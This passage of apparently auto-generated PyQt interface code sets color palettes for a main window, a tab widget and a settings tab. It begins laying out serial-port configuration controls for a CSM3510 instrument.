brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.centralwidget.setPalette(palette)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setContentsMargins(-1, -1, -1, 0)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setEnabled(True)
self.tabWidget.setBaseSize(QtCore.QSize(480, 590))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tabWidget.setPalette(palette)
self.tabWidget.setAutoFillBackground(False)
self.tabWidget.setUsesScrollButtons(True)
self.tabWidget.setMovable(True)
self.tabWidget.setObjectName("tabWidget")
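# --- Settings tab: serial-port configuration for each connected instrument ---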
self.tab_setting = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tab_setting.sizePolicy().hasHeightForWidth())
self.tab_setting.setSizePolicy(sizePolicy)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tab_setting.setPalette(palette)
self.tab_setting.setObjectName("tab_setting")
self.gridLayout_7 = QtWidgets.QGridLayout(self.tab_setting)
self.gridLayout_7.setObjectName("gridLayout_7")
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setSpacing(0)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_3 = QtWidgets.QLabel(self.tab_setting)
self.label_3.setText("")
self.label_3.setObjectName("label_3")
self.horizontalLayout_12.addWidget(self.label_3)
self.horizontalLayout_11.addLayout(self.horizontalLayout_12)
self.gridLayout_12 = QtWidgets.QGridLayout()
self.gridLayout_12.setContentsMargins(10, -1, 10, -1)
self.gridLayout_12.setObjectName("gridLayout_12")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout_8 = QtWidgets.QVBoxLayout()
self.verticalLayout_8.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_8.setObjectName("verticalLayout_8")
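# CSM3510 block: a read-only header line edit plus three read-only caption
# fields and a settings button on the left; port / baud-rate / data-bits
# combo boxes and an auto-detect button on the right.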
self.csm3510_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.csm3510_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
